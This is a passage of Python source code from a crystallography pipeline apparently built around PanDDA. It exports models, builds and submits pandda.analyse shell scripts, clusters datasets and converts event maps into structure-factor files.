db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_sites.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + 'as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input paramters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove exisiting mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal
# but phenix.map_to_structure_facors only accepts maps in spg P1
# therefore map is first expanded to full unit cell and spg of map then set tp p1
# other conversion option like cinvfft give for whatever reason uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
